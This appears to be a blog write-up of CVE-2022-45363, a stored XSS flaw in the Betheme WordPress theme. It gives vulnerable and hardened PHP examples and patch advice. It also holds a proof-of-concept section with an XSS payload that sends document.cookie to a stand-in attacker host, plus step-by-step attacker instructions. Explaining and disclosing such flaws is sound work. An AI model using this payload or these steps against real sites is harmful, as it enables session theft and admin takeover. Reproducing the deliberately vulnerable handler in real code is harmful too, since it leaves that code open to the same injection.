WordPress is used by millions of websites, and many of them rely on premium themes to make their sites look professional and operate smoothly. One of the most popular premium themes is Betheme by Muffingroup. But like any piece of software, themes can have security flaws. In this long read, let’s take a close, exclusive look at CVE-2022-45363 – a vulnerability discovered in Betheme that could have allowed authenticated users (even low-level subscribers) to inject malicious scripts into WordPress sites. We will explore the vulnerability, how it works, see a code snippet, and discuss ways attackers could exploit it.
### What is CVE-2022-45363?
CVE-2022-45363 is an authenticated stored cross-site scripting (XSS) vulnerability in the Betheme WordPress theme, present in all versions up to and including 26.6.1. "Stored" means the malicious code is saved in the database and executed every time someone views the affected page, which makes it potentially highly dangerous.
The root cause is that the theme did not properly sanitize or escape some input fields in its admin panel. As a result, a logged-in user with very basic permissions (as low as the "subscriber" role) could inject arbitrary JavaScript. When an administrator or another user viewed the affected page, that script would run in their browser, possibly stealing cookies, redirecting them, or causing other mischief.
Because this is an authenticated XSS, the attacker needs a valid user account (even a subscriber one) for the attack to work, but that is not a high barrier on community or membership sites, or wherever registration is open.
Before diving deeper, here is where you can read more from official and community sources:
- CVE-2022-45363 on NVD (National Vulnerability Database)
- Patchstack Security Advisory
- Muffingroup Theme Changelog
### Vulnerable Components
The vulnerability lies in the way Betheme handles certain user inputs within the admin area. For example, fields such as custom post options, headers, or widgets could receive HTML/JS input. These inputs were not correctly sanitized using WordPress's esc_html() or wp_kses() functions:
- The theme saves this input verbatim to the database.
- Later, any other user or admin who views the modified area has the attacker's JavaScript executed as part of the page.
Because the theme did not verify capabilities (using current_user_can()) in the right places, even a minimal-permission user could inject script.
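As an added illustration (not Betheme's own code), here is a hypothetical theme option named `header_title`, first handled the way the advisory describes (no capability check, no sanitization, no output escaping) and then the way WordPress expects it to be handled. The block assumes WordPress core is loaded, since `current_user_can()`, `check_admin_referer()`, `sanitize_text_field()`, `esc_html()`, `wp_kses()`, `update_option()` and `get_option()` all come from core; the option name, the `demo_*` function names and the hook name are invented for the example.

```php
<?php
// Added example, not Betheme's code. Assumes WordPress core is loaded; the
// option name "demo_header_title" and all demo_* functions are hypothetical.

// ---- Vulnerable pattern: the class of bug described in the advisory ----
function demo_save_header_title_vulnerable() {
    if ( isset( $_POST['header_title'] ) ) {
        // No capability check, no nonce, no sanitization: any logged-in user
        // who can reach this handler stores raw HTML/JS in wp_options.
        update_option( 'demo_header_title', $_POST['header_title'] );
    }
}

function demo_render_header_title_vulnerable() {
    // Unescaped output: whatever was stored runs in every viewer's browser.
    echo '<h1>' . get_option( 'demo_header_title', '' ) . '</h1>';
}

// ---- Hardened pattern: capability check, nonce, sanitize in, escape out ----
function demo_save_header_title_secure() {
    if ( ! isset( $_POST['header_title'] ) ) {
        return;
    }
    // 1. Only users who may change theme settings can write this option;
    //    a subscriber fails this check.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // 2. CSRF protection: the form must include wp_nonce_field( 'demo_save_header' ).
    check_admin_referer( 'demo_save_header' );
    // 3. Sanitize on input. The title is plain text, so strip every tag,
    //    control character and surrounding whitespace.
    $title = sanitize_text_field( wp_unslash( $_POST['header_title'] ) );
    update_option( 'demo_header_title', $title );
}

function demo_render_header_title_secure() {
    // 4. Escape on output as well, so a value that reached the database by
    //    another path (import, older theme version, direct SQL) still cannot execute.
    echo '<h1>' . esc_html( get_option( 'demo_header_title', '' ) ) . '</h1>';
}

// For a field that legitimately needs limited HTML (e.g. a widget body),
// allow-list tags and attributes with wp_kses() instead of stripping everything.
// wp_kses() also drops disallowed URL protocols such as javascript: in href.
function demo_sanitize_widget_body( $raw ) {
    $allowed = array(
        'a'      => array( 'href' => true, 'title' => true ),
        'strong' => array(),
        'em'     => array(),
        'br'     => array(),
        'p'      => array(),
    );
    return wp_kses( wp_unslash( $raw ), $allowed );
}

// Wire the hardened handler to a form that posts action=demo_save_header
// to admin-post.php (logged-in users only).
add_action( 'admin_post_demo_save_header', 'demo_save_header_title_secure' );
```

The two halves of the fix are independent and both matter: the capability check stops a subscriber from writing the option at all, while sanitizing on input and escaping on output mean that even a value that somehow reaches the database cannot execute. With `demo_sanitize_widget_body()`, a `<script>` tag is removed (its inner text stays behind as inert text) and an `href="javascript:..."` attribute is stripped because `javascript:` is not an allowed protocol.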
### Proof of Concept (PoC)
Let’s see a simple code example of what an attacker might do.
Don’t try this on a live or production site!
Suppose there’s a custom field for the theme called "Header Title," and it’s not sanitized.
A user could enter:

```html
XSS Test<script>alert('Hacked by XSS!')</script>
```

When an administrator (or any user) views the page rendering this field, their browser will execute:

```javascript
alert('Hacked by XSS!')
```

Instead of an alert, the attacker might use something stealthier, like:

```html
<script>fetch('https://evil-attacker.com/steal?cookie='+document.cookie)</script>
```
With this code, every time a victim views the compromised page, their browser silently sends cookies to the attacker’s server.
### Exploit Details – Step by Step
Here is an example proof-of-concept flow that an attacker could follow, assuming registration is enabled:
1. Log in with your new account.
2. Find a field exposed by Betheme's custom panel (for example, some site meta option, widget content, or similar).
3. Inject XSS: add code, e.g. `<script>alert('pwnd');</script>`, or the stealthier cookie stealer above.
4. Wait for an admin to visit the page; their browser executes your JavaScript.
5. Profit: depending on your JS, you can steal session cookies, deface the site, redirect the user, create admin accounts, etc.

- Even after a malicious user is banned, their injected code may persist.
- Sites that accept user registrations are especially at risk!
### Patch and Solution
After being notified, Muffingroup fixed this problem in Betheme version 26.6.2. You can see their changelog here:
Betheme Changelog
### Conclusion
CVE-2022-45363 shows how even a popular premium WordPress theme can have dangerous flaws. If you run WordPress, always keep plugins and themes updated, and regularly review user roles and registrations. If you're a developer, always sanitize every bit of user input and escape every bit of output.
Have you checked your WordPress themes for security updates lately? Stay safe out there!
### Further Reading
- XSS in WordPress: What you need to know – Patchstack Blog
- WordPress Data Sanitization and Validation
*This article was written to provide original, clear guidance for site owners, pentesters, and developers. Feel free to share with your peers and always test in a safe environment!*
### Timeline
Published on: 11/22/2022 08:15:00 UTC
Last modified on: 11/28/2022 19:49:00 UTC